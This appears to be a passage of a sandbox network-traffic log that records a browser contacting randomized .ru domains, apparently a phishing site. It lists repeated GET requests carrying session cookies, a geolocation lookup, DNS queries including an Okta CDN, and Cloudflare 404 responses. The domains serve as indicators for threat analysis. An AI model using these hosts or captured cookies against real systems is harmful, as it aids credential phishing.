              Source: global trafficHTTP traffic detected: GET /ije3pOU4IZXELEnJ9SQsl7KHlYZLa5jNXqd5ay3wmnqGiK0OQGKe8QplOobs12210 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klUFkUijZI8I4maIlmmk2KISbvzpmlMHBwASJqop1GyoWwyBN3QjMZ1joZJYwTUQKUEewGU3tab221 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrbzLihqqHn3mripsOT5Db20HBuvasjMFehCA0C8VtI0S6ypeD5YyJPwTcd237 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnEHvdn1lma3Z8sOdlltAtMcHGRU9cMcDgEVOl56x6FVZXhsfhriLH22Suv220 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsryoNCzrUl1bJ4h00jRRztjIlnqEseCh1qwZ9uvTMdxXKJkfUJqmtCcd192 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stAgM8pQbgeY39sLvNM3QdVigIfOuUymnT3dbGJ3vdGJjthz7pw9e82ef260 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /gwHj3OKkOhv2tq5VLatsgOER8pOzdGx6oYQYV6RpAhW6P7Tyxe HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNQdlp3UEFVQ2x2WG9jOHR2ZjRLR0E9PSIsInZhbHVlIjoiVFN6UkszRG5tSUFoelUzN1dRNVdTREpDellQRG9mVm5lSVFTR1hQdXNLT3pVMUkvNzZHdXZRZlZoQ0hqR1pGNXpmQ0c4SStMckYwQkZhWVNlZTdtNS9KbWVPbnRjZUp0bFMvam1kS2NhNVJnUDZkMzFwWFlwZVFIbFVGaVpLNmEiLCJtYWMiOiI4ZTlkNDEwNmU0YmM5NGVjMGE4N2E1ODU3MzI4MGM4NmFmY2ZmMzZkNzE5YTRhMWJhMDU3YWIyOTA3MWZmZTI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ4cE5VZ2tIcCtyY1hkTkk5dUhrN2c9PSIsInZhbHVlIjoiK1ljNExqV3pSMkFQYmtZaU9BNkRTeGJsTERZV1Y4a3g0RS80ZmVLKy81eVc1a2pDV1BJRTJORmZxTEFJTmIwSHBocXEyWHZnK3hnWXE0SzZ4S1duTk1Vc0FZRW5qL0hCdU4yUWg5cXVJVlNDRW5VeHRnNFNRYnpUWWZpN1FuOGUiLCJtYWMiOiI3OGRmOTdkMDA3M2M1ODc2NWJlYzI4ZGE1NjE3ZTFhOTA2MGIxZmMwMjE3YTMyZGQyMzcyYjM1MDg5YjVlZjk3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxv83bmfFs993ZebAr6zux5SnJKV0rVR7L7ElmnyAXnB9Hd7rV1iW6Juab179 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNQdlp3UEFVQ2x2WG9jOHR2ZjRLR0E9PSIsInZhbHVlIjoiVFN6UkszRG5tSUFoelUzN1dRNVdTREpDellQRG9mVm5lSVFTR1hQdXNLT3pVMUkvNzZHdXZRZlZoQ0hqR1pGNXpmQ0c4SStMckYwQkZhWVNlZTdtNS9KbWVPbnRjZUp0bFMvam1kS2NhNVJnUDZkMzFwWFlwZVFIbFVGaVpLNmEiLCJtYWMiOiI4ZTlkNDEwNmU0YmM5NGVjMGE4N2E1ODU3MzI4MGM4NmFmY2ZmMzZkNzE5YTRhMWJhMDU3YWIyOTA3MWZmZTI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ4cE5VZ2tIcCtyY1hkTkk5dUhrN2c9PSIsInZhbHVlIjoiK1ljNExqV3pSMkFQYmtZaU9BNkRTeGJsTERZV1Y4a3g0RS80ZmVLKy81eVc1a2pDV1BJRTJORmZxTEFJTmIwSHBocXEyWHZnK3hnWXE0SzZ4S1duTk1Vc0FZRW5qL0hCdU4yUWg5cXVJVlNDRW5VeHRnNFNRYnpUWWZpN1FuOGUiLCJtYWMiOiI3OGRmOTdkMDA3M2M1ODc2NWJlYzI4ZGE1NjE3ZTFhOTA2MGIxZmMwMjE3YTMyZGQyMzcyYjM1MDg5YjVlZjk3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ije3pOU4IZXELEnJ9SQsl7KHlYZLa5jNXqd5ay3wmnqGiK0OQGKe8QplOobs12210 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNQdlp3UEFVQ2x2WG9jOHR2ZjRLR0E9PSIsInZhbHVlIjoiVFN6UkszRG5tSUFoelUzN1dRNVdTREpDellQRG9mVm5lSVFTR1hQdXNLT3pVMUkvNzZHdXZRZlZoQ0hqR1pGNXpmQ0c4SStMckYwQkZhWVNlZTdtNS9KbWVPbnRjZUp0bFMvam1kS2NhNVJnUDZkMzFwWFlwZVFIbFVGaVpLNmEiLCJtYWMiOiI4ZTlkNDEwNmU0YmM5NGVjMGE4N2E1ODU3MzI4MGM4NmFmY2ZmMzZkNzE5YTRhMWJhMDU3YWIyOTA3MWZmZTI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ4cE5VZ2tIcCtyY1hkTkk5dUhrN2c9PSIsInZhbHVlIjoiK1ljNExqV3pSMkFQYmtZaU9BNkRTeGJsTERZV1Y4a3g0RS80ZmVLKy81eVc1a2pDV1BJRTJORmZxTEFJTmIwSHBocXEyWHZnK3hnWXE0SzZ4S1duTk1Vc0FZRW5qL0hCdU4yUWg5cXVJVlNDRW5VeHRnNFNRYnpUWWZpN1FuOGUiLCJtYWMiOiI3OGRmOTdkMDA3M2M1ODc2NWJlYzI4ZGE1NjE3ZTFhOTA2MGIxZmMwMjE3YTMyZGQyMzcyYjM1MDg5YjVlZjk3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrbzLihqqHn3mripsOT5Db20HBuvasjMFehCA0C8VtI0S6ypeD5YyJPwTcd237 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNQdlp3UEFVQ2x2WG9jOHR2ZjRLR0E9PSIsInZhbHVlIjoiVFN6UkszRG5tSUFoelUzN1dRNVdTREpDellQRG9mVm5lSVFTR1hQdXNLT3pVMUkvNzZHdXZRZlZoQ0hqR1pGNXpmQ0c4SStMckYwQkZhWVNlZTdtNS9KbWVPbnRjZUp0bFMvam1kS2NhNVJnUDZkMzFwWFlwZVFIbFVGaVpLNmEiLCJtYWMiOiI4ZTlkNDEwNmU0YmM5NGVjMGE4N2E1ODU3MzI4MGM4NmFmY2ZmMzZkNzE5YTRhMWJhMDU3YWIyOTA3MWZmZTI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ4cE5VZ2tIcCtyY1hkTkk5dUhrN2c9PSIsInZhbHVlIjoiK1ljNExqV3pSMkFQYmtZaU9BNkRTeGJsTERZV1Y4a3g0RS80ZmVLKy81eVc1a2pDV1BJRTJORmZxTEFJTmIwSHBocXEyWHZnK3hnWXE0SzZ4S1duTk1Vc0FZRW5qL0hCdU4yUWg5cXVJVlNDRW5VeHRnNFNRYnpUWWZpN1FuOGUiLCJtYWMiOiI3OGRmOTdkMDA3M2M1ODc2NWJlYzI4ZGE1NjE3ZTFhOTA2MGIxZmMwMjE3YTMyZGQyMzcyYjM1MDg5YjVlZjk3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stAgM8pQbgeY39sLvNM3QdVigIfOuUymnT3dbGJ3vdGJjthz7pw9e82ef260 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNQdlp3UEFVQ2x2WG9jOHR2ZjRLR0E9PSIsInZhbHVlIjoiVFN6UkszRG5tSUFoelUzN1dRNVdTREpDellQRG9mVm5lSVFTR1hQdXNLT3pVMUkvNzZHdXZRZlZoQ0hqR1pGNXpmQ0c4SStMckYwQkZhWVNlZTdtNS9KbWVPbnRjZUp0bFMvam1kS2NhNVJnUDZkMzFwWFlwZVFIbFVGaVpLNmEiLCJtYWMiOiI4ZTlkNDEwNmU0YmM5NGVjMGE4N2E1ODU3MzI4MGM4NmFmY2ZmMzZkNzE5YTRhMWJhMDU3YWIyOTA3MWZmZTI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ4cE5VZ2tIcCtyY1hkTkk5dUhrN2c9PSIsInZhbHVlIjoiK1ljNExqV3pSMkFQYmtZaU9BNkRTeGJsTERZV1Y4a3g0RS80ZmVLKy81eVc1a2pDV1BJRTJORmZxTEFJTmIwSHBocXEyWHZnK3hnWXE0SzZ4S1duTk1Vc0FZRW5qL0hCdU4yUWg5cXVJVlNDRW5VeHRnNFNRYnpUWWZpN1FuOGUiLCJtYWMiOiI3OGRmOTdkMDA3M2M1ODc2NWJlYzI4ZGE1NjE3ZTFhOTA2MGIxZmMwMjE3YTMyZGQyMzcyYjM1MDg5YjVlZjk3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://iy8se.zvptaird.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: iy8se.zvptaird.ru
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: 214w.hxnywi.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: get.geojs.io
              Source: global trafficDNS traffic detected: DNS query: xpu1hu2cwgnh4mqh5i3tuu4tude80aclh6qmsxfwqmgblrmgdbermbw.xpwqud.ru
              Source: unknownHTTP traffic detected: POST /report/v4?s=BGxXsHrasUr3fJlvR8R6dZkeNXLE33Ir9TNznnZVblEYUXurQGTCDNStRhFQz5hKUygq1%2FRcIWLOBKbA9sbHPjOjjFWCv6aeVkxrQHT6pydoIEFtp5AZYup7%2By0c HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 431Content-Type: application/reports+jsonOrigin: https://iy8se.zvptaird.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 20:32:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: HITAge: 36Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BGxXsHrasUr3fJlvR8R6dZkeNXLE33Ir9TNznnZVblEYUXurQGTCDNStRhFQz5hKUygq1%2FRcIWLOBKbA9sbHPjOjjFWCv6aeVkxrQHT6pydoIEFtp5AZYup7%2By0c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=104869&min_rtt=103869&rtt_var=31080&sent=5&recv=8&lost=0&retrans=1&sent_bytes=4228&recv_bytes=2165&delivery_rate=3315&cwnd=106&unsent_bytes=0&cid=d169a17c285a4067&ts=566&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 9258f0cd18b6659d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103704&min_rtt=102924&rtt_var=22520&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1900&delivery_rate=36189&cwnd=243&unsent_bytes=0&cid=f52fa3c962c581aa&ts=239&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 20:33:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyMNYD7E4BNBdVoqW5Qs%2FX6kolODwNDwAhbHnkqywrimJITT4c93rrUQMUQEAMENo0PRVzrpfDd9xTNdDg25TGd4ByaFRpViDR3OZTZx4JKqbA%2BSCpoyj%2FamCt%2BI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=96369&min_rtt=94279&rtt_var=39535&sent=6&recv=8&lost=0&retrans=2&sent_bytes=5652&recv_bytes=2038&delivery_rate=12933&cwnd=147&unsent_bytes=0&cid=5b64d88501e91ca7&ts=614&x=0"Server: cloudflareCF-RAY: 9258f1890e6e23dd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=110057&min_rtt=108524&rtt_var=25392&sent=7&recv=8&lost=0&retrans=1&sent_bytes=3162&recv_bytes=1706&delivery_rate=2781&cwnd=234&unsent_bytes=0&cid=204b6f6819da2c6e&ts=13449&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 20:33:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2B8qvnHDAflmwziWmRnhTJLq6UqCQogBmNIryRLNDoczCCNlxUgV%2BkzOeW%2F73btqLTFHMMxshs0IZ5nHUlOC65Q8JGWXAU3Tr4rc340lgEd4FhG%2BwhVigG671Itd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=119870&min_rtt=104280&rtt_var=70285&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5654&recv_bytes=2039&delivery_rate=6195&cwnd=70&unsent_bytes=0&cid=8560f6bfb47e83d5&ts=844&x=0"Server: cloudflareCF-RAY: 9258f1db9e045e76-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106049&min_rtt=105518&rtt_var=22746&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1706&delivery_rate=35253&cwnd=227&unsent_bytes=0&cid=3720487440a8dafd&ts=1617&x=0"
